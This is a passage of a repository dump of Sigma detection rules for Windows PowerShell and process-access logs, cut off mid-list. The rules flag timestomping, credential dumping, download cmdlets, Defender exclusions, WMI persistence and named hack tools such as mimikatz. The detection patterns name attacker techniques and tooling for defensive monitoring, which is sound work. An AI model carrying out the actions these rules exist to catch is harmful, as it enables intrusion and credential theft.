    "content": "title: Testing Usage of Uncommonly Used Port\nid: adf876b3-f1f8-4aa9-a4e4-a64106feec06\nstatus: test\ndescription: |\n    Adversaries may communicate using a protocol and port pairing that are typically not associated.\n    For example, HTTPS over port 8088 (Citation: Symantec Elfin Mar 2019) or port 587 (Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell\n    - https://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-01-23\ntags:\n    - attack.command-and-control\n    - attack.t1571\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Test-NetConnection\n            - '-ComputerName '\n            - '-port '\n    filter:\n        ScriptBlockText|contains:\n            - ' 443 '\n            - ' 80 '\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_timestomp.yml",
    "content": "title: Powershell Timestomp\nid: c6438007-e081-42ce-9483-b067fbef33c3\nstatus: test\ndescription: |\n    Adversaries may modify file time attributes to hide new files or changes to existing files.\n    Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md\n    - https://www.offensive-security.com/metasploit-unleashed/timestomp/\nauthor: frack113\ndate: 2021-08-03\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_ioc:\n        ScriptBlockText|contains:\n            - '.CreationTime ='\n            - '.LastWriteTime ='\n            - '.LastAccessTime ='\n            - '[IO.File]::SetCreationTime'\n            - '[IO.File]::SetLastAccessTime'\n            - '[IO.File]::SetLastWriteTime'\n    condition: selection_ioc\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml",
    "content": "title: User Discovery And Export Via Get-ADUser Cmdlet - PowerShell\nid: c2993223-6da8-4b1a-88ee-668b8bf315e9\nrelated:\n    - id: 1114e048-b69c-4f41-bc20-657245ae6e3f\n      type: similar\nstatus: test\ndescription: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-ADUser '\n            - ' -Filter \\*'\n        ScriptBlockText|contains:\n            - ' > '\n            - ' | Select '\n            - 'Out-File'\n            - 'Set-Content'\n            - 'Add-Content'\n    condition: selection\nfalsepositives:\n    - Legitimate admin scripts may use the same technique; it is better to exclude specific computers or users who execute these commands or scripts often\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml",
    "content": "title: Potential Persistence Via PowerShell User Profile Using Add-Content\nid: 05b3e303-faf0-4f4a-9b30-46cc13e69152\nstatus: test\ndescription: Detects calls to the \"Add-Content\" cmdlet that modify the content of the user profile, potentially adding suspicious commands for persistence\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-08-18\nmodified: 2023-05-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.013\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_add:\n        ScriptBlockText|contains: 'Add-Content $profile'\n    selection_options:\n        ScriptBlockText|contains:\n            # Note: You can add more suspicious values\n            - '-Value \"IEX '\n            - '-Value \"Invoke-Expression'\n            - '-Value \"Invoke-WebRequest'\n            - '-Value \"Start-Process'\n            - \"-Value 'IEX \"\n            - \"-Value 'Invoke-Expression\"\n            - \"-Value 'Invoke-WebRequest\"\n            - \"-Value 'Start-Process\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml",
    "content": "title: Abuse of Service Permissions to Hide Services Via Set-Service - PS\nid: 953945c5-22fe-4a92-9f8a-a9edc1e522da\nrelated:\n    - id: 514e4c3a-c77d-4cde-a00f-046425e2301e\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Set-Service\" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\", etc. (works only in PowerShell 7)\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Set-Service '\n            - 'DCLCWPDTSD'\n        ScriptBlockText|contains:\n            - '-SecurityDescriptorSddl '\n            - '-sd '\n    condition: selection\nfalsepositives:\n    - Rare intended use of hidden services\n    - Rare FP could occur due to the non-linearity of the ScriptBlockText log\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_vbscript_registry_modification.yml",
    "content": "title: Registry Modification Attempt Via VBScript - PowerShell\nid: 2a0a169d-cc66-43ce-9ae2-6e678e54e46a\nrelated:\n    - id: 921aa10f-2e74-4cca-9498-98f9ca4d6fdf\n      type: similar\n    - id: 7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to modify the registry using VBScript's CreateObject(\"Wscript.shell\") and RegWrite methods embedded within PowerShell scripts or commands.\n    Threat actors commonly embed VBScript code within PowerShell to perform registry modifications, attempting to evade detection that monitors for direct registry access through traditional tools.\n    This technique can be used for persistence, defense evasion, and privilege escalation by modifying registry keys without using regedit.exe, reg.exe, or PowerShell's native registry cmdlets.\nreferences:\n    - https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/\n    - https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/\n    - https://detect.fyi/hunting-fileless-malware-in-the-windows-registry-1339ccde00ad\ndate: 2025-08-13\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1112\n    - attack.t1059.005\nlogsource:\n    category: ps_script\n    product: windows\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'CreateObject'\n            - 'Wscript.shell'\n            - '.RegWrite'\n    condition: selection\nfalsepositives:\n    - Some legitimate admin or install scripts may use these processes for registry modifications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml",
    "content": "title: Veeam Backup Servers Credential Dumping Script Execution\nid: 976d6e6f-a04b-4900-9713-0134a353e38b\nstatus: test\ndescription: Detects execution of a PowerShell script that contains calls to the \"Veeam.Backup\" class, in order to dump stored credentials.\nreferences:\n    - https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '[Credentials]'\n            - '[Veeam.Backup.Common.ProtectedStorage]::GetLocalString'\n            - 'Invoke-Sqlcmd'\n            - 'Veeam Backup and Replication'\n    condition: selection\nfalsepositives:\n    - Administrator backup scripts (must be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml",
    "content": "title: Usage Of Web Request Commands And Cmdlets - ScriptBlock\nid: 1139d2e2-84b1-4226-b445-354492eba8ba\nrelated:\n    - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d\n      type: derived\nstatus: test\ndescription: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs\nreferences:\n    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/\n    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell\nauthor: James Pemberton / @4A616D6573\ndate: 2019-10-24\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - '[System.Net.WebRequest]::create'\n            - 'curl '\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring\n            - 'iwr '\n            # - 'Net.WebClient' # There are various other rules that cover this, so it is commented out\n            - 'Resume-BitsTransfer'\n            - 'Start-BitsTransfer'\n            - 'wget '\n            - 'WinHttp.WinHttpRequest'\n    filter:\n        Path|startswith: 'C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n    condition: selection and not filter\nfalsepositives:\n    - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml",
    "content": "title: Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript\nid: e2812b49-bae0-4b21-b366-7c142eafcde2\nstatus: test\ndescription: Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: ps_script\n    product: windows\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection_class:\n        ScriptBlockText|contains: 'Win32_NTEventlogFile'\n    selection_function:\n        ScriptBlockText|contains:\n            - '.BackupEventlog('\n            - '.ChangeSecurityPermissions('\n            - '.ChangeSecurityPermissionsEx('\n            - '.ClearEventLog('\n            - '.Delete('\n            - '.DeleteEx('\n            - '.Rename('\n            - '.TakeOwnerShip('\n            - '.TakeOwnerShipEx('\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration and backup scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml",
    "content": "title: PowerShell WMI Win32_Product Install MSI\nid: 91109523-17f0-4248-a800-f81d9e7c081d\nstatus: test\ndescription: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\nauthor: frack113\ndate: 2022-04-24\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Invoke-CimMethod '\n            - '-ClassName '\n            - 'Win32_Product '\n            - '-MethodName '\n            - '.msi'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml",
    "content": "title: Potential WinAPI Calls Via PowerShell Scripts\nid: 03d83090-8cba-44a0-b02f-0b756a050306\nrelated:\n    - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702\n      type: similar\nstatus: test\ndescription: Detects use of WinAPI functions in PowerShell scripts\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Nasreddine Bencherchali (Nextron Systems), Nikita Nazarov, oscd.community\ndate: 2020-10-06\nmodified: 2023-06-20\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1106\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    # Note: Add more suspicious combinations in the form of different selections\n    selection_injection:\n        ScriptBlockText|contains|all:\n            - 'VirtualAlloc'\n            - 'OpenProcess'\n            - 'WriteProcessMemory'\n            - 'CreateRemoteThread'\n    selection_token_steal:\n        ScriptBlockText|contains|all:\n            - 'OpenProcessToken'\n            - 'LookupPrivilegeValue'\n            - 'AdjustTokenPrivileges'\n    selection_duplicate_token:\n        ScriptBlockText|contains|all:\n            - 'OpenProcessToken'\n            - 'DuplicateTokenEx'\n            - 'CloseHandle'\n    selection_process_write_read:\n        ScriptBlockText|contains|all:\n            - 'WriteProcessMemory'\n            - 'VirtualAlloc'\n            - 'ReadProcessMemory'\n            - 'VirtualFree'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml",
    "content": "title: Windows Defender Exclusions Added - PowerShell\nid: c1344fa2-323b-4d2e-9176-84b4d4821c88\nrelated:\n    - id: 17769c90-230e-488b-a463-e05c08e9d48f\n      type: similar\nstatus: test\ndescription: Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions\nreferences:\n    - https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-16\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: ps_script\n    product: windows\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_args_exc:\n        ScriptBlockText|contains:\n            - ' -ExclusionPath '\n            - ' -ExclusionExtension '\n            - ' -ExclusionProcess '\n            - ' -ExclusionIpAddress '\n    selection_args_pref:\n        ScriptBlockText|contains:\n            - 'Add-MpPreference '\n            - 'Set-MpPreference '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml",
    "content": "title: Windows Firewall Profile Disabled\nid: 488b44e7-3781-4a71-888d-c95abfacf44d\nrelated:\n    - id: 12f6b752-042d-483e-bf9c-915a6d06ad75\n      type: similar\nstatus: test\ndescription: Detects when a user disables the Windows Firewall via a Profile to help evade defense.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps\n    - https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell\n    - https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php\n    - http://woshub.com/manage-windows-firewall-powershell/\n    - https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html\nauthor: Austin Songer @austinsonger\ndate: 2021-10-12\nmodified: 2022-12-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_args:\n        ScriptBlockText|contains|all:\n            - 'Set-NetFirewallProfile '\n            - ' -Enabled '\n            - ' False'\n    selection_opt:\n        ScriptBlockText|contains:\n            - ' -All '\n            - 'Public'\n            - 'Domain'\n            - 'Private'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml",
    "content": "title: Winlogon Helper DLL\nid: 851c506b-6b7c-4ce2-8802-c703009d03c0\nstatus: test\ndescription: |\n    Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n    Registry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\n    used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\n    load and execute malicious DLLs and/or executables.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2022-07-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'CurrentVersion\\Winlogon'\n    selection2:\n        ScriptBlockText|contains:\n            - 'Set-ItemProperty'\n            - 'New-Item'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml",
    "content": "title: Powershell WMI Persistence\nid: 9e07f6e7-83aa-45c6-998e-0af26efd0a85\nstatus: test\ndescription: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md\n    - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545\nauthor: frack113\ndate: 2021-08-19\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_ioc:\n        - ScriptBlockText|contains|all:\n              - 'New-CimInstance '\n              - '-Namespace root/subscription '\n              - '-ClassName __EventFilter '\n              - '-Property ' # is a variable name\n        - ScriptBlockText|contains|all:\n              - 'New-CimInstance '\n              - '-Namespace root/subscription '\n              - '-ClassName CommandLineEventConsumer '\n              - '-Property ' # is a variable name\n    condition: selection_ioc\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml",
    "content": "title: WMIC Unquoted Services Path Lookup - PowerShell\nid: 09658312-bc27-4a3b-91c5-e49ab9046d1b\nrelated:\n    - id: 68bcd73b-37ef-49cb-95fc-edc809730be6\n      type: similar\nstatus: test\ndescription: Detects a known WMI recon method to look for unquoted service paths, often used inside PowerShell enumeration scripts by pentesters and attackers\nreferences:\n    - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py\n    - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2022-11-25\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Get-WmiObject '\n            - 'gwmi '\n        ScriptBlockText|contains|all:\n            - ' Win32_Service '\n            - 'Name'\n            - 'DisplayName'\n            - 'PathName'\n            - 'StartMode'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml",
    "content": "title: WMImplant Hack Tool\nid: 8028c2c3-e25a-46e3-827f-bbb5abf181d7\nstatus: test\ndescription: Detects parameters used by WMImplant\nreferences:\n    - https://github.com/FortyNorthSecurity/WMImplant\nauthor: NVISO\ndate: 2020-03-26\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'WMImplant'\n            - ' change_user '\n            - ' gen_cli '\n            - ' command_exec '\n            - ' disable_wdigest '\n            - ' disable_winrm '\n            - ' enable_wdigest '\n            - ' enable_winrm '\n            - ' registry_mod '\n            - ' remote_posh '\n            - ' sched_job '\n            - ' service_mod '\n            - ' process_kill '\n            # - ' process_start '\n            - ' active_users '\n            - ' basic_info '\n            # - ' drive_list '\n            # - ' installed_programs '\n            - ' power_off '\n            - ' vacant_system '\n            - ' logon_events '\n    condition: selection\nfalsepositives:\n    - Administrative scripts that use the same keywords.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml",
    "content": "title: Suspicious X509Enrollment - Ps Script\nid: 504d63cb-0dba-4d02-8531-e72981aace2c\nrelated:\n    - id: 114de787-4eb2-48cc-abdb-c0b449f93ea4\n      type: similar\nstatus: test\ndescription: Detect use of X509Enrollment\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41\n    - https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115\nauthor: frack113\ndate: 2022-12-23\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'X509Enrollment.CBinaryConverter'\n            - '884e2002-217d-11da-b2a4-000e7bbb2b09'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml",
    "content": "title: Powershell XML Execute Command\nid: 6c6c6282-7671-4fe9-a0ce-a2dcebdc342b\nstatus: test\ndescription: |\n    Adversaries may abuse PowerShell commands and scripts for execution.\n    PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\n    Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests\nauthor: frack113\ndate: 2022-01-19\nmodified: 2023-01-19\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_xml:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - 'System.Xml.XmlDocument'\n            - '.Load'\n    selection_exec:\n        ScriptBlockText|contains:\n            - 'IEX '\n            - 'Invoke-Expression '\n            - 'Invoke-Command '\n            - 'ICM -'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml",
    "content": "title: CMSTP Execution Process Access\nid: 3b4b232a-af90-427c-a22f-30b0c0837b95\nstatus: stable\ndescription: Detects various indicators of Microsoft Connection Manager Profile Installer execution\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nauthor: Nik Seetharaman\ndate: 2018-07-16\nmodified: 2021-06-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218.003\n    - attack.execution\n    - attack.t1559.001\n    - attack.g0069\n    - attack.g0080\n    - car.2019-04-001\nlogsource:\n    product: windows\n    category: process_access\ndetection:\n    # Process Access Call Trace\n    selection:\n        CallTrace|contains: 'cmlua.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate CMSTP use (unlikely in modern enterprise environments)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml",
    "content": "title: HackTool - CobaltStrike BOF Injection Pattern\nid: 09706624-b7f6-455d-9d02-adee024cee1d\nstatus: test\ndescription: Detects a typical pattern of a CobaltStrike BOF which inject into other processes\nreferences:\n    - https://github.com/boku7/injectAmsiBypass\n    - https://github.com/boku7/spawn\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-04\nmodified: 2023-11-28\ntags:\n    - attack.execution\n    - attack.t1106\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        CallTrace|re: '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$'\n        GrantedAccess:\n            - '0x1028'\n            - '0x1fffff'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_generic_access.yml",
    "content": "title: HackTool - Generic Process Access\nid: d0d2f720-d14f-448d-8242-51ff396a334e\nstatus: test\ndescription: Detects process access requests from hacktool processes based on their default image name\nreferences:\n    - https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158\n    - https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel\ndate: 2023-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        - SourceImage|endswith:\n              - '\\Akagi.exe'\n              - '\\Akagi64.exe'\n              - '\\atexec_windows.exe'\n              - '\\Certify.exe'\n              - '\\Certipy.exe'\n              - '\\CoercedPotato.exe'\n              - '\\crackmapexec.exe'\n              - '\\CreateMiniDump.exe'\n              - '\\dcomexec_windows.exe'\n              - '\\dpapi_windows.exe'\n              - '\\findDelegation_windows.exe'\n              - '\\GetADUsers_windows.exe'\n              - '\\GetNPUsers_windows.exe'\n              - '\\getPac_windows.exe'\n              - '\\getST_windows.exe'\n              - '\\getTGT_windows.exe'\n              - '\\GetUserSPNs_windows.exe'\n              - '\\gmer.exe'\n              - '\\hashcat.exe'\n              - '\\htran.exe'\n              - '\\ifmap_windows.exe'\n              - '\\impersonate.exe'\n              - '\\Inveigh.exe'\n              - '\\LocalPotato.exe'\n              - '\\mimikatz_windows.exe'\n              - '\\mimikatz.exe'\n              - '\\netview_windows.exe'\n              - '\\nmapAnswerMachine_windows.exe'\n              - '\\opdump_windows.exe'\n              - '\\PasswordDump.exe'\n              - '\\Potato.exe'\n              - '\\PowerTool.exe'\n              - '\\PowerTool64.exe'\n              - '\\psexec_windows.exe'\n              - '\\PurpleSharp.exe'\n              - '\\pypykatz.exe'\n              - '\\QuarksPwDump.exe'\n              - '\\rdp_check_windows.exe'\n              - '\\Rubeus.exe'\n              - '\\SafetyKatz.exe'\n              - '\\sambaPipe_windows.exe'\n              - '\\SelectMyParent.exe'\n              - '\\SharpChisel.exe'\n              - '\\SharPersist.exe'\n              - '\\SharpEvtMute.exe'\n              - '\\SharpImpersonation.exe'\n              - '\\SharpLDAPmonitor.exe'\n              - '\\SharpLdapWhoami.exe'\n              - '\\SharpUp.exe'\n              - '\\SharpView.exe'\n              - '\\smbclient_windows.exe'\n              - '\\smbserver_windows.exe'\n              - '\\sniff_windows.exe'\n              - '\\sniffer_windows.exe'\n              - '\\split_windows.exe'\n              - '\\SpoolSample.exe'\n              - '\\Stracciatella.exe'\n              - '\\SysmonEOP.exe'\n              - '\\temp\\rot.exe'\n              - '\\ticketer_windows.exe'\n              - '\\TruffleSnout.exe'\n              - '\\winPEASany_ofs.exe'\n              - '\\winPEASany.exe'\n              - '\\winPEASx64_ofs.exe'\n              - '\\winPEASx64.exe'\n              - '\\winPEASx86_ofs.exe'\n              - '\\winPEASx86.exe'\n              - '\\xordump.exe'\n        - SourceImage|contains:\n              - '\\goldenPac'\n              - '\\just_dce_'\n              - '\\karmaSMB'\n              - '\\kintercept'\n              - '\\LocalPotato'\n              - '\\ntlmrelayx'\n              - '\\rpcdump'\n              - '\\samrdump'\n              - '\\secretsdump'\n              - '\\smbexec'\n              - '\\smbrelayx'\n              - '\\wmiexec'\n              - '\\wmipersist'\n              - 'HotPotato'\n              - 'Juicy Potato'\n              - 'JuicyPotato'\n              - 'PetitPotam'\n              - 